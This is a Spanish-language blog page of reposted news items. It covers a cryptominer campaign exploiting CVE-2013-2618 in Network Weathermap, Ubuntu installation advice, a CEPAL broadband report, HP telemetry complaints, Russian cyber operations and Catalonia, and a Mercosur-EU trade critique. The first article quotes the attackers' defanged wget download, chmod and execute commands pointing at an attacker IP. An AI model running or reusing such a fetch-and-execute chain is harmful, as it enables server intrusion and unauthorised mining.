Una falla de Linux de 5 años permite a los atacantes minar criptomonedas

fallo linux

Esto de la minera de las criptomonedas con el uso de equipos remotos sin la autorización de los dueños de estos se esta convirtiendo en una tendencia. Ya había hablado sobre esto en algunas ocasiones aquí en el blog sobre este tipo de situación.

Y es que esto ya se ha salido de control totalmente desde el momento en que las criptomonedas han tomado un lugar y valor bastante considerable, personas con los conocimientos suficientes para acceder a equipos vulnerando su seguridad han dejado de lado el perder el tiempo en buscar información importante o cuentas de banco para obtener un beneficio monetario.

En vez de hace esto optan por lo mas sencillo en tomar el control de estos equipos y unirlos en una red de minería y además para otras tareas que comúnmente hacen con una botnet.

De esta forma suele ser más renumerarte, pues solo se están centrando en el dinero instantáneo que esto genera.

Con la comprensión inteligente de las tendencias del mercado y el conocimiento adecuado de cripto comercio, uno puede cosechar grandes beneficios.

¿Es Linux realmente un sistema seguro?

Muchos tenemos la idea de que Linux es un sistema operativo seguro casi perfecto, la realidad es que todavía tiene algunos defectos.

Pues hace algunos días TrendMicro realizo un hallazgo, en el cual reveló un nuevo defecto en los sistemas Linux que dio a los hackers la ventaja de extraer criptomonedas usando los servidores y máquinas Linux.

En un comunicado a través de su blog comentaron lo siguiente:

A través de nuestro monitoreo relacionado con la respuesta a incidentes, observamos intentos de intrusión cuyos indicadores pudimos correlacionar con una campaña anterior de minería de criptomoneda que utilizó el malware JenkinsMiner.

La diferencia: esta campaña se dirige a servidores Linux. También es un caso clásico de vulnerabilidades reutilizadas, ya que explota una falla de seguridad obsoleta cuyo parche ha estado disponible durante casi cinco años.

En este comunicado mediante su análisis lograron identificar los sitios afectados por este fallo que afecta principalmente a Japón, Taiwán, China, EE. UU y la India.

Análisis del ataque

Mediante el análisis por parte de Smart Protection Network de Trend Micro detallan un poco en como los atacantes se aprovechan de este fallo:

Los operadores de esta campaña estaban explotando CVE-2013-2618 , una vulnerabilidad fechada en el plugin Camapi Network Weathermap, que los administradores del sistema usan para visualizar la actividad de la red.

En cuanto a por qué están explotando un viejo defecto de seguridad: Network Weathermap solo tiene dos vulnerabilidades reportadas públicamente hasta el momento, ambas desde junio de 2014.

Es posible que estos atacantes estén aprovechando no solo una falla de seguridad para la cual un exploit está disponible sino también del retraso de parches que ocurre en las organizaciones que usan la herramienta de código abierto.

Básicamente el ataque es mediante un ataque XSS:

weathermap-cryptominer-4

La parte borrosa es el objetivo de ataque, un servidor web con un puerto .

El archivo /plugins/weathermap/configs/conn.php es el archivo resultante del ataque persistente XSS en /plugins/weathermap /php .

Además de conn.php inicial, observamos una solicitud HTTP similar que se aplica a una página llamada ‘ cools.php ‘.

El programa para minar criptomonedas es distribuido a través de la vulnerabilidad del mapa meteorológico de PHP en los objetivos que son servidores de Linux

En la imagen se puede apreciar cómo se genera el ataque y se describe del siguiente modo:

wget watchd0g.sh hxxp: // 222 [.] 184 [.]] 79 [.] 11: 5317 / watchd0g [.] sh

Lo que hace es mandar la indicación de descargar un archivo con wget la cual es una utilidad que casi todas las distribuciones de Linux tienen instalada por defecto

chmod 775 watchd0g.sh

hace que el archivo sea ejecutable

./watchd0g.sh

Lo que hace finalmente, es que el archivo se ejecute en el servidor.

Afortunadamente, ya hay un parche ( CVE-2013-2618 ) disponible para la falla y puedes descargarlo desde este enlace.

Si quieres conocer mas al respecto de este fallo puedes visitar este enlace.

Fuente: Cryptocurrency Miner Distributed via PHP Weathermap Vulnerability, Targets Linux Servers

 

Telegram @Entreverao

¿Pensando en instalar Ubuntu? Varias cosas que deberías tener en cuenta

ubuntu-1

El último gran lanzamiento de Canonical ha cumplido su primer mes de vida y, con las actualizaciones que ya ha recibido, se puede decir que se ha estabilizado lo suficiente como para considerar dar el salto. Es el momento perfecto, pues, para actualizar nuestra guía de instalación de Ubuntu, así como otros tutoriales que irán apareciendo en los próximos días.

Antes, con el objetivo de que los artículos que publiquemos sean lo más concisos posible, os exponemos una serie de consideraciones previas especialmente dedicadas a nuevos usuarios. Y es que instalar Ubuntu es muy sencillo, pero yendo sobre seguro se tarda mucho menos en hacerlo todo… y no hablamos solo del proceso de instalación. Así que, antes de hacer nada, piensa en lo siguiente:

¿Qué Ubuntu instalar?

Con respecto a la versión, en estos momentos, hablamos de Ubuntu 18.04 LTS, disponible desde abril de 2018 y con soporte hasta 2023. Sin embargo, Ubuntu tiene una serie de ediciones oficiales que se pueden ajustar mejor a tus necesidades, ya sea por gusto personal o por las especificaciones de tu equipo. La diferencia entre ellas es el entorno de escritorio y el consumo del mismo.

De acuerdo a nuestras pruebas te recomendamos, en orden:

  • Kubuntu, Ubuntu, Ubuntu MATE, Ubuntu Budgie, Xubuntu, Lubuntu.

En relación al consumo de recursos, la recomendación varía (de menos a más recursos):

  • Lubuntu, Xubuntu, Ubuntu MATE, Kubuntu, Ubuntu Budgie, Ubuntu.

No obstante, probarlas todas no cuesta demasiado y vale la pena invertir un rato en ello.

Probar, antes de instalar

¿Quieres instalar Ubuntu por mera curiosidad? Si lo único que te interesa es echar un vistazo, puedes descargarlo, instalarlo en una memoria USB y arrancar tu equipo con ella, sin alterar tu disco y el sistema operativo que ya tengas instalado. Necesitarás:

  • Una memoria USB de 2 GB o más.
  • La imagen de instalación de Ubuntu (enlace anterior).
  • Una aplicación para pasar la imagen al USB. Te recomendamos Etcher.
  • Buscar en tu BIOS la opción de arranque adecuada.

Pero ten en cuenta que de este modo el rendimiento y estabilidad de Ubuntu (o de cualquier otra distribución Linux que pruebes en vivo) se resienten considerablemente.

Estabilidad y soporte

Si buscas un sistema de escritorio para producción a largo plazo y lo más importante para ti es la estabilidad, tienes dos opciones que quizás te convengan más que instalar Ubuntu 18.04 en estos momentos:

  • Ubuntu 16.04.4 LTS, actualmente en su “punto de maduración óptimo” y con soporte hasta 2021.
  • Esperar a que en julio se lance Ubuntu 18.04.1, primera versión de mantenimiento y la que Canonical habilitará como actualización para los usuarios de Ubuntu 16.04.

Alternativas

La “familia Ubuntu” está muy bien nutrida y las versiones LTS (con soporte extendido por cinco años) son su mejor exponente, pero GNU/Linux ofrece un amplio abanico de alternativas de lo más interesante. De todas, la única que recomendamos para nuevos usuarios es Linux Mint, basada en Ubuntu LTS y, por lo tanto, con los beneficios de esta, incluyendo el soporte y la compatibilidad de software; pero con una presentación más amigable si cabe.

Linux Mint, a su vez, cuenta con tres ediciones oficiales, que también se distinguen por el entorno de escritorio y que te recomendamos en el siguiente orden (en orden inverso, de menor a mayor consumo de recursos):

  • Linux Mint Cinnamon, Linux Mint MATE y Linux Mint Xfce.

La última versión disponible es Linux Mint 18.3, basada en Ubuntu 16.04 LTS y con soporte hasta 2021; mientras que la próxima Linux Mint 19 se basa en Ubuntu 18.04 LTS y su lanzamiento se espera para las próximas semana (igualmente, conviene que repose un tiempo antes de instalar).

Instalación en equipos de 32-bit

Todas las ediciones oficiales de Ubuntu mantienen el soporte de 32-bit, excepto la propia Ubuntu. Para instalar Ubuntu en equipos de 32-bit hay que seguir una guía diferente y algo más complicada. No obstante, esta será muy probablemente la última versión de largo recorrido en soportar los 32-bit.

Ubuntu y Windows

Si lo que te interesa es instalar Ubuntu en el mismo equipo en el que usas Windows, vete a la guía de instalación de Ubuntu y Windows que publican nuestros compañeros de MuyComputer, actualizada para las últimas versiones de ambos sistemas.

Hasta aquí lo principal. Siempre que tengas claro todo lo anterior, instalar Ubuntu es tan sencillo como instalar Windows y mucho más rápido. En breve publicamos la guía de instalación.

 

Fuente: muylinux

Telegram @Entreverao

 

 

CEPAL destaca avances en uso y asequibilidad de Internet en América Latina pero se mantienen importantes inequidades en acceso

CEPAL destaca avances en uso y asequibilidad de Internet en América Latina pero se mantienen importantes inequidades en acceso

Entre 2010 y 2015 creció el uso de Internet América Latina y Caribe en 20 puntos porcentuales hasta alcanzar al 55% de la población impulsado por la banda ancha móvil, así como también el servicio se ha vuelto más asequible de acuerdo con los datos del informe “Estado de la banda ancha en América Latina y el Caribe 2016” de CEPAL. En 2010 una conexión de banda ancha fija de 1 Mbps representaba el 18% de los ingresos mensuales y a comienzos de 2016 significaba el 2%.

Sin embargo, CEPAL concluye que a pesar de estos avances, aún queda pendiente avanzar en materia de calidad y equidad en el acceso. “Ningún país de la región tiene al menos 5% de sus conexiones con velocidades mayores de 15Mbps mientras que, en los países avanzados, el porcentaje de conexiones de esta velocidad es cercano al 50%”, señala el estudio que además advierte inequidades en el acceso entre las zonas rurales y urbanas (41 puntos porcentuales), y entre quintiles de la distribución del ingreso.

En términos de acceso, Costa Rica es el país con mayor número de hogares conectados a Internet en América Latina y Caribe, mientras que Nicaragua es el país menos conectado. No obstante, los países menos conectados como Nicaragua, El Salvador, Guatemala y Bolivia fueron los que mayores tasas de crecimiento tuvieron en el período 2010-2015, mientras que Chile y Argentina (entre los de mayor penetración) y México y Perú (penetración media y baja respectivamente) cayeron dos posiciones en el mismo período.

De acuerdo con las cifras de CEPAL, la penetración de Internet en relación a la distribución del ingreso, en promedio en la región, tuvo un crecimiento en los sectores más ricos que duplicó al de los sectores más pobres (18 sobre 100 hogares conectados en el quintil 4 y 16 sobre 100 en el quintil 5 frente a 9 conexiones en el quintil 1).

“El país con mayor penetración en el Q1 fue Chile (33,2%). En los quintiles 2, 3 y 4, fue Uruguay. En el Q5, Costa Rica (80,3%). La penetración en el Q2 en Brasil, Colombia, Ecuador, Paraguay, Perú, el Estado Plurinacional de Bolivia y El Salvador; en el Q3 en Ecuador, Perú, Paraguay, El Salvador y Bolivia, y en el Q4 en Perú, Paraguay, Bolivia y El Salvador era menor que la de Chile y Costa Rica en el Q1”, señala el informe.

Cepal


Informe “Estado de la banda ancha en América Latina y el Caribe”

Fuente: nodal

Telegram @Entreverao

El presunto spyware preinstalado en equipos de HP pone en pie de guerra a los usuarios

El presunto spyware preinstalado en equipos de HP pone en pie de guerra a los usuarios

HP es el fabricante de PCs que más vende en todo el mundo junto a Lenovo y Dell, y por ello resulta especialmente singular que la empresa haya caído en el mismo error que sus dos rivales: ambas se vieron sacudidas por las críticas al descubrirse que habían preinstalado spyware en sus equipos.

Ahora es HP la que está afectada por el mismo problema: diversos usuarios han protestado por un cliente de telemetría asociado a la herramienta HP Touchpoint Analytics Client que se instala sin permiso y que según esas críticas ralentiza los equipos. Es fácil detectar si estás afectado, y también es relativamente sencillo solucionar el problema.

Una actualización de HP (o Microsoft), potencial culpable

Las quejas sobre el problema comenzaron a aparecer el pasado 15 de noviembre, y algunos apuntan a que ciertas actualizaciones de Windows disponibles para los equipos de HP pudieron ser las responsables. No está claro si actualizaciones en los controladores del hardware de los equipos de HP es el responsable, y ni esta empresa ni Microsoft (a quienes otros apuntan como culpable del problema) aún no ha realizado comentarios para aclarar la situación.

Hp1

Una de las quejas deja claro cómo tras la instalación de este cliente el equipo se ralentiza debido a un consumo excepcional de recursos por parte de dicha herramienta.

Su finalidad no parece clara salvo por una breve descripción que revela que la telemetría que recolecta este servicio «se usa por los servicios de estadísticas de HP Touchpoint».

Así puedes detectar y eliminar el problema

En GHacks han analizado el problema y han revelado que es posible detectar si este servicio está funcionando en cualquier equipo de HP a través del gestor de tareas. No solo eso: es posible deshabilitarlo con la herramienta de gestión de servicios que podremos lanzar pulsando Windows+R y luego escribiendo «services.msc».

Malware2

Eso nos permitirá detectar si el llamado «HP Touchpoint Analytics Client» está en esa lista, en cuyo caso podremos hacer doble clic en ese servicio para abrir sus detalles, establecer que esté «Deshabilitado» en el inico y además detener el servicio en la sesión actual.

Como opción, explican en GHacks, también podremos pulsar Windows+R, escribir «appwiz.cpl» y lanzar así el gestor de «Programas y Características» de Windows, desde el que podremos localizar la aplicación «HP Touchpoint Manager». Si aparece en la lista, simplemente tenemos que pinchar en ella con el botón derecho del ratón y seleccionar la opción «Desinstalar» para eliminarla.

A pesar de que la solución parece sencilla, el problema es mucho más profundo: la insistencia de estas empresas a la hora de instalar clientes y servicios sin avisar y sin esperar la confirmación de los usuarios es preocupante, sobre todo cuando estos servicios pueden amenazar la privacidad de estos usuarios.

Fuente: xataka

Telegram @Entreverao

Hackers rusos, ciberguerra y el conflicto en Cataluña

¿Qué pruebas existen de la actividad ofensiva rusa en el ciberespacio? ¿Se han reproducido estas operaciones en España aprovechando el conflicto catalán? Al CNI no le consta.

En octubre de 2014, diversas cuentas de correo de trabajadores de la Casa Blanca y del Departamento de Estado de EEUU recibieron un mensaje que adjuntaba un vídeo humorístico en Adobe Flash. Mostraba una oficina en la que los ejecutivos eran monos vestidos con traje y corbata permanentemente de fiesta y un único humano resignado a trabajar para semejantes sujetos. Era imposible evitar que se compartiera un contenido que se ajustaba tan bien a las reglas de la memecracia. Con poco esfuerzo, la pieza cumplió su propósito: esparcirse rápidamente… y propagar por las redes internas un programa espía (spyware) que se ejecutaba inadvertidamente mientras se reproducía el vídeo y que acabó comprometiendo seriamente las comunicaciones del Gobierno estadounidense.

Los ‘hackers rusos’

Meses después se supo que el ataque procedía de unos de los actores paraestatales vinculados a Rusia: el grupo denominado Cozy Bear (o ‘Cozy Duke’ o APT29). Este agente, junto con el conocido como Fancy Bear (o APT28 o Sofocy) estarían detrás, según las investigaciones de algunas de las principales empresas de seguridad informática (como KasperskyFireEye o F-Secure), de las operaciones de ciberguerra de Rusia (en concreto, del GRU, los servicios de inteligencia de su ejército), entre ellas, la posible interferencia en las elecciones norteamericanas de 2016 y otras consultas posteriores en Europa a través del robo de información sensible y de elaboradas campañas de intoxicación informativa.

Estos grupos no han actuado en España para llevar a cabo algún tipo de ciberataque contra equipos o sistemas durante la crisis catalana, según ha constatado el CNI. Aunque sí lo han hecho en el pasado, según se recoge en memorias de años anteriores de este organismo.

¿Qué evidencias existen de la actividad ofensiva rusa en el ciberespacio? ¿Se han reproducido estas operaciones en España aprovechando el conflicto en Cataluña? ¿Cómo funcionan estas campañas de ciberpropaganda? ¿Qué buscan y qué impacto real tienen? ¿Es posible ‘hackear’ unas elecciones? ¿Sobre qué deberíamos estar verdaderamente alerta y prevenidos? (spoiler: todo apunta a que puede ser peor el remedio que la enfermedad).

Y, finalmente, ¿por qué es tan complicado saber con certeza lo que está ocurriendo?

Es cierto que algunas incertidumbres en torno a estas cuestiones estarían justificadas; por ejemplo, las que se deben a la dificultad de atribuir con precisión cualquier ataque en el ciberespacio. Sin embargo, otras son menos aceptables, al tratarse claramente de campañas interesadas que buscan imponer una determinada narrativa.

No debería sorprendernos: la máxima que afirma que “la primera víctima en una guerra es la verdad” aquí se cumple siempre.

1. La actividad de Rusia en la ciberguerra

Aunque con frecuencia los titulares periodísticos destacan el riesgo que representan los ciberterroristas o ciberdelincuentes, en realidad, según el CNI, “la mayor amenaza para la ciberseguridad nacional son las acciones de los Estados, muy especialmente aquellas que tienen su origen en los servicios de inteligencia”.

AUNQUE CON FRECUENCIA LOS TITULARES DESTACAN EL RIESGO QUE REPRESENTAN LOS CIBERTERRORISTAS, EN REALIDAD, SEGÚN EL CNI, “LA MAYOR AMENAZA PARA LA CIBERSEGURIDAD NACIONAL SON LAS ACCIONES DE LOS ESTADOS

Numerosos países vienen invirtiendo “importantes recursos para dotarse de capacidades de defensa y, también, de ataque”. Todos los indicios apuntan a que España no es una excepción. Estados Unidos, China, Rusia y Corea son las potencias más activas en este terreno.

Las acciones que se atribuyen al Kremlin no son nuevas y abarcan desde lo que se considera el primer ataque con ‘bots’ (máquinas zombies previamente ‘secuestradas’) a un país entero, Estonia, en 2007, hasta lasdiversas ofensivas contra infraestructuras críticas de Ucrania en 2015 y 2016, que parecen haber servido de banco de pruebas para una ciberguerra a mayor escala.

Por supuesto, el Gobierno ruso siempre ha negado su implicación en estas operaciones. Lo más cerca que ha estado de algún tipo de reconocimiento fueron las declaraciones de Putin el pasado 1 de junio, cuando, en un encuentro con periodistas se refirió a “hackers patrióticos” que habrían actuado por su cuenta. Un día después tachaba de “histeria” las acusaciones.

2. ¿Quién hizo qué? El problema de la atribución de ataques en el ciberespacio

Si en el terreno de “la inteligencia” (del espionaje) todo es, por definición, incierto, cuando estas campañas se libran en el ciberespacio la complejidad aumenta inevitablemente. Y es un error notable no tenerlo en cuenta.

Como advierte el experto en seguridad Bruce Schneier, “las operaciones militares clandestinas no son una novedad, particularmente en los límites turbios del terrorismo de Estado. La novedad en el ciberespacio es lo fácil que resulta para un atacante enmascarar su identidad, y la gran cantidad de gente e instituciones que pueden atacar anónimamente y que están usando las mismas herramientas y las mismas armas”.

Incidentes como el del virus ‘Stuxnet’, conocido como el primer ‘ciberarma’, no fueron reconstruidos hasta años después, cuando se logró determinar con bastante certeza la autoría de Estados Unidos e Israel.

LA NOVEDAD EN EL CIBERESPACIO ES LO FÁCIL QUE RESULTA PARA UN ATACANTE ENMASCARAR SU IDENTIDAD Y LA GRAN CANTIDAD DE GENTE E INSTITUCIONES QUE PUEDEN ATACAR ANÓNIMAMENTE

¿Cómo se realiza, entonces, la atribución de un ataque? En general, a través de indicios como la configuración del teclado del equipo empleado para programar un malware, el idioma en los metadatos; el horario de trabajo de una determinada zona del mundo, o por patrones del comportamiento de atacantes ya identificados y que se repiten.

Las pruebas, por tanto, se consiguen acumulando el mayor número de indicios sólidos posibles y siendo transparentes con los hallazgos, de modo que puedan ser rebatidos o contrastados por el resto de la comunidad de inteligencia o ciberseguridad.

Como puede suponerse, la atribución de un ciberataque se encuentra con serios problemas en el caso de las frecuentes operaciones “de bandera falsa”: aquellas en los que, a propósito, se dejan pistas erróneas apuntando a un tercer país.

Además, la atribución se complica aún más si tenemos en cuenta las recientes advertencias de investigadores de Kaspersky, presentadas en la última Virus Bulletin Digital Security Conference de Madrid, el pasado 4 de octubre, y que fueron recogidas, entre otros medios, por The Intercept.

“Cuando los investigadores forenses ven los mismos algoritmos de cifrado y certificados digitales reutilizados, por ejemplo, en varios ataques, tienden a suponer que los ataques fueron perpetrados por el mismo grupo. Pero esto no es necesariamente así”, advertían; el boletín explicaba que habían detectado hackers paraestatales usando “herramientas” (malware, exploits…) robadas que habían sido previamente empleadas por piratas de otros estados.

Un método más completo de atribución es el que propone el experto y académico Thomas Rid, del King’s College de Londres, basado en un análisis por capas: estratégico (qué busca el ataque, a quién beneficia, qué se ataca), operacional (cómo se realiza) y táctico-técnico (con qué instrumentos –tipo de malware…– se ha llevado a cabo).

3. El supuesto ‘hackeo’ ruso a las elecciones de EEUU 

Que hay actividad rusa en la Red para interferir en procesos políticos de otros países es un hecho que se encuentra respaldado con cada vez más pruebas, en particular en el caso de las últimas elecciones norteamericanas, donde, presumiblemente, se produjo una acción combinada de robo de información y acciones de intoxicación informativa.

Además, hace apenas unas semanas, la agencia Associated Press presentaba nuevos hechos: el 2 de noviembre revelaba quiénes habían sido objetivo de las operaciones de espionaje de los hackers rusos. Entre otros: “Oficiales ucranianos, figuras de la oposición, contratistas de defensa de los EE.UU. Y otros miles de adversarios del Kremlin”, desde el representante del Papa en Kiev a las Pussy Riot.

Para AP, esta lista aporta “la más detallada evidencia forense hasta el momento del estrecho alineamiento entre los hackers y el Gobierno ruso”.

LA INFORMACIÓN DE AP MUESTRA CÓMO LOS HACKERS SE ABRIERON PASO EN EL EQUIPO DE LA CAMPAÑA DE CLINTON HASTA LLEGAR A ROBAR LOS CORREOS ELECTRÓNICOS DEL PRESIDENTE JOHN PODESTA

Dos días después, el 4 de noviembre, AP reconstruía en detalle, a partir del análisis de una base de datos de 19.000 enlaces maliciosos (los usados en la campaña de phishing lanzada por los atacantes que habrían quedado al descubierto por un error al dejar pública su cuenta en la herramienta para acortar enlaces bit.ly), cómo se había producido el ataque a los sistemas del Partido Demócrata.

La información muestra cómo los hackers se abrieron paso en el equipo de la campaña de Clinton hasta llegar a robar los correos electrónicos del presidente John Podesta en marzo de 2016.

También ayuda a explicar un dato que probablemente en el futuro tenga mayores consecuencias: cómo un intermediario vinculado con Rusia presumía ante un asesor de Trump, un mes después, de que el Kremlin tenía «miles de correos electrónicos» que valían la pena sobre Clinton. Los correos robados se publicaron posteriormente, enmascarando la filtración como la acción de un hacker solitario, Guccifer 2.0.

Esta operación se combinó con una campaña masiva de propagandaorientada a alimentar la polarización de la opinión pública y también, según documentos internos de la NSA publicados por The Intercept, con otros ataques a organismos relacionados con el proceso electoral.

A pesar de las dudas iniciales, las informaciones vienen a corroborar el análisis de los servicios de inteligencia norteamericanos sobre esta ofensiva rusa contra la campaña de Hillary Clinton. Otra cuestión es determinar su impacto concreto en los resultados electorales, teniendo en cuenta que la estrategia demócrata tampoco fue la más acertada para conectar con su electorado o que los movimientos de última hora del FBI contra la candidata pudieron ser igualmente decisivos.

Existe la sospecha de que este mismo patrón de ataque combinado se ha producido en otros procesos electorales, como en las pasadas votaciones en Francia. ¿Y en España? El martes 21 de noviembre, el CNI descartó que haya ocurrido algo similar en el caso del conflicto catalán y ha asegurado no haber detectado ningún ciberataque del gobierno ruso durante la crisis.

4. Qué se sabe (y qué no) sobre la supuesta campaña rusa en Cataluña

Hasta el momento, la tesis de una supuesta injerencia rusa en Cataluña a partir de operaciones de intoxicación informativa en redes sociales se apoya principalmente en los datos aportados por el Instituto Elcano. Por el momento son escasos: que “el hashtag #Catalonia generó más de 150.279 tweets y retweets, y que alrededor de 40.000 de esas interacciones vinieron de la cuenta de Twitter de Julian Assange, mientras que 8.198 tweets y retweets surgieron de la cuenta de Edward Snowden”; y que “que las cuentas de Twitter favorables al Kremlin han aumentado en un 2000% sus menciones a la crisis catalana (detectada por la herramienta Hamilton 68), mediante el uso del hashtag #Catalan en dichas cuentas”.

Faltan datos relevantes sobre la supuesta intervención “de hackers rusos” en Cataluña. En cambio, muchas informaciones contenían errores, algunos de bulto.

Por ejemplo, confundir el número de interacciones de los tuits de Assange con el de los mensajes que realmente había publicado, o considerar un hecho significativo el porcentaje de seguidores falsos de la cuenta en Twitter del creador de Wikileaks, cuando esto es un hecho que se repite en cualquier perfil, como explicaba El Salto desmontando esa información que, además, se apoyaba en una cifra antigua sin actualizar.

Algunas de estas informaciones son meras distorsiones interesadas, que tratan de atribuir a campañas externas el indudable apoyo popular hacia la causa independentista y, en particular, el de su comunidad hacker(incluyendo algunas figuras históricas destacadas) que replicaron masivamente la web del referéndum cerrada por orden judicial o hicieron posible el ‘censo universal’. O que se intente presentar como una campaña orquestada las críticas internacionales por la violencia policial del 1 de octubre.

Tampoco debería causar extrañeza que activistas de los derechos digitales, como Snowden, se manifestaran en contra del cierre de webs en Cataluña. Organizaciones independientes como la EFF también lo censuraron.

En cuanto al origen geográfico de supuestos “tuits falsos” con mensajes polémicos sobre Cataluña, hay que tener en cuenta que, mediante análisis de redes, solo hay dos formas de establecerlo, como explica la profesora Mari Luz Congosto: o por el origen declarado en el perfil (suponiendo que sea cierto lo que se afirma) –el 65,4% de las cuentas lo incluyen– o porque sean tuits geolocalizados. El dato más fiable es la IP del usuario, una información que sólo conoce Twitter. Por lo tanto, es otra acusación que también conviene tomar con precaución.

TAMPOCO DEBERÍA CAUSAR EXTRAÑEZA QUE ACTIVISTAS DE LOS DERECHOS DIGITALES, COMO SNOWDEN, SE MANIFESTARAN EN CONTRA DEL CIERRE DE WEBS EN CATALUÑA

Por otro lado, el crecimiento abrupto de un hashtag como indicador de que una campaña es inducida no tiene por qué implicar que se trata de una maniobra exterior, como demuestran cientos de acciones de ciberactivismo.

En cuanto a la implicación del líder de Wikileaks, es cierto que se observan indicios llamativos, como su desproporcionado interés de por la cuestión catalana o algunas de sus acciones para alimentar la discusión (genialidades del arte del ‘trolleo’, que tan bien domina el hacker australiano) como polemizar con Pérez Reverte. Pero, naturalmente, no pueden considerarse pruebas de algún tipo de acción coordinada si no hay una investigación con evidencias sólidas que les diera contexto.

Y estas pruebas no parece que vayan a lograrse, al menos en lo que se refiere a una acción combinada con ciberataques para robar información o comprometer equipos, que no se ha dado en España según los datos del CNI.

5. Cómo funcionan las campañas de ciberpropaganda

El éxito de las acciones de ciberpropaganda se basa, al igual que las ataques por phishing en un gran conocimiento sobre cómo funciona Internet y sus usuarios.

No son acciones que busquen prosperar por sí mismas, sino que se suman a olas que ya existen para acentuarlas, y se aprovechan de las dinámicas previsibles de la red. Por ejemplo, del hecho de que un porcentaje elevado de la población se informa a través de las redes sociales (el 67% según Pew Research); o de la pericia para las polémicas de nidos de trolls como ‘4chan’, o de la tendencia a los bulos tendenciosos entre los afines a ideologías extremistas.

Expertos como el analista @thegrugq destacan que, en el caso de las campañas de desinformación de supuesto origen ruso, el objetivo no sería tanto apoyar una determinada causa sino fomentar la polarización de la opinión pública y sembrar dudas sobre lo que es cierto y lo que no.

Para ello, estas campañas se sirven de “granjas” de cuentas automatizadas, bots, trolls, fakes y perfiles influyentes.

En el caso de las acciones de intoxicación rusa en la campaña electoral norteamericana, se ha identificado el papel de la Internet Research Agency (IRA), una oficina en San Petersburgo que emplea a cientos de personas para postear contenidos falsos y conflictivos en la red.

Nadie duda tampoco del papel de las grandes empresas tecnológicas. De hecho, han publicado sendos informes (aquí el de Facebook y aquí el de Twitter) sobre cómo han podido ser utilizadas en las presuntas campañas de desinformación rusas y, hace unos días, han tenido que someterse al agresivo interrogatorio de senadores y congresistas en las respectivas comisiones de investigación que analizan la presunta ofensiva rusa contra las elecciones de 2016.

En cuanto a Europa, desde 2015 existe una unidad especial destinada a identificar bulos e información falsa sobre la UE, la European External Action Service East Stratcom Task Force , como recordaba Público en una información reciente.

Según este servicio europeo, las noticias falsas sobre el conflicto catalán que tienen identificadas se refieren a temas como que el español se enseña como lengua extranjera en Cataluña o que la Unión Europea apoya la violencia policial durante el referéndum.

6. Y, ¿ahora qué?

Para empezar, podemos esforzamos por comprender cómo funcionan estas campañas de intoxicación para no seguir alimentándolas incluso cuando pensamos que las estamos combatiendo; debemos exigir datos verificables y total transparencia sobre el alcance de estas operaciones en caso de que realmente se hayan producido; y sobre todo, tenemos que vigilar de cerca las “soluciones” que se están tomando o se vayan a tomar, porque todo apunta a que van a terminar afectando a nuestras libertades. Adivinen quién gana siempre.

————————-

Yolanda Quintana es periodista. Autora del libro Ciberguerra (editorial Catarata).

Fuente: http://ctxt.es

Telegram @Entreverao

El Tratado Mercosur-Unión Europea es peor que el ALCA

Jeferson Miola

Los gobiernos de Argentina, Brasil, Paraguay y [inclusive] de Uruguay anuncian la firma del Tratado de Libre Comercio del Mecosur con la Unión Europea (UE) en el marco de la undécima Reunión Ministerial de la OMC, en la semana de 10 a 14 de diciembre, en Buenos Aires.

Si fuera firmado, este Tratado será equivalente a la sentencia de muerte del Mercosur, y traerá compromisos graves para las economías de los países del bloque, porque interdita las perspectivas de desarrollo económico autónomo y soberano y elimina las políticas  tecnológicas e industriales de cada país e de este importante bloque regional:

– El Mercosur deberá reducir las tarifas de importación para productos fabricados por empresas europeas, cuyo desarrollo histórico permitió la actual producción de estas empresas en condiciones tecnológicas más avanzadas y con padrones de competitividad superiores a las empresas del Mercosur, cuyos países se encuentran en estadio atrasados de desarrollo (subdesarrollados).

– El impuesto para  importar bienes, productos manufacturados y servicios de la UE deberá ser equiparado a la tarifa praue trasnacionalesctica intra-Mercosur (una media del 4%) , que tiene  preferencias tarifarias y estímulos a los intercambios intra-bloque, concebidas para estimular el desarrollo económico, tecnológico y la generación de empleos nacionales/regionales.

– La Unión Europea no amplía o actual mercado exportador para los commodities producidos en los países del Mercosur. Para proteger (correctamente) sus productores agropecuarios, los gobiernos de varios países europeo no están inclusive exigiendo la reducción, a través de este Tratado, de las actuales cuotas de importación de proteínas importadas del Mercosur;

– Con la apertura  indiscriminada, se producirá una avalancha de importación de manufacturas europeas, como efecto de la desprotección aduanera de la industria nacional/regional;

– Ocurrirá la destrucción de las empresas del bloque, dado que aún no poseen  capacidad competitiva frente a las empresas europeas (y estaodounidensess, chinas, japonesas, etc).

– Con la eliminación de las barreras tarifarias y aduaneras, las megatrasnacionales europeas podrán evaluar como más conveniente la exportacición de sus matrices en Europa (donde generarán los empleos hoy generados aquí) que mantener fábricas instaladas en las últimas décadas en los países del bloque para disputar el abastecimiento del mercado regional.

La consecuencia del Tratado, además del desempleo en escala subcontinental, será la desindustrialización acentuada y la condena de los países del Mercosur a la reprimarización productiva.

ue no al tlcEl Tratado Mercosur-UE permitirá, además, que cualquier otra potencia económica mundial –EEUU, China, Japón- pueda invocar la Cláusula de Nación más favorecida de la Organización Mundial de Comercio (OMC) para recibir el mismo trato obtenido por las empresas europeas, representando un proceso de colonización económica, comercial, tecnológica y cultural, aún mayor.

Los efectos del acuerdo para el Mercosur serán mucho peores que el proyecto orginal del Área de Libre Comercio de las Américas (ALCA), aquella ambiciosa estrategia de anexión  política, cultural y económica del hemisferio americano que Estados Unidos no consiguieron imponer.

El ALCA fue sepultada en 2005, en la também argentina ciudad de Mar del Plata, en la Cumbre de las Américas. En esa ocasión, Lula, Chávez, Kirchner y o próprio Tabaré Vásquez  (que esta vez parece haber adherido al TLC con la UE) tuvieron destacado papel en la vitoria del No al ALCA, consigna que sintetizaba la voz del pueblo latinoamericano contra ese proyecto lanzado en 1994 por el gobierno del demócrata Bill Clinton y perseverantemente conducido por la administración república de George W. Bush.

El Tratado Mercosur-UE es mantenido, guardado en absoluto secreto por las cancillerías, agencias y ministerios económicos de los países del bloque sudamericano. Su contenido fue elaborado secretamente y decidido dentro de la más absoluta clandestinidad.

Es un acuerdo, por eso, que carga un notable déficit democrático. Dada la repercusión futura, de enorme impacto sobre la soberanía y la capacidad de desarrollo de cada país, este acuerdo no puede ser firmado sin el amplio conocimiento y el debate previo con las sociedades civiles y los parlamentos nacionales.

*Integrante del Instituto de Debates, Estudios e Alternativas (Idea) de Porto Alegre (Brasil),  fue coordinador-ejecutivo del 5º Fóro Social Mundial y Director de la Secretaría Administrativa del Mercosur. Distribuido por el Centro Latinoamericano de Análisis Estratégico (CLAE, estrategia.la)

Fuente: questiondigital

Telegram @Entreverao

Presidente Maduro tiene canal Telegram

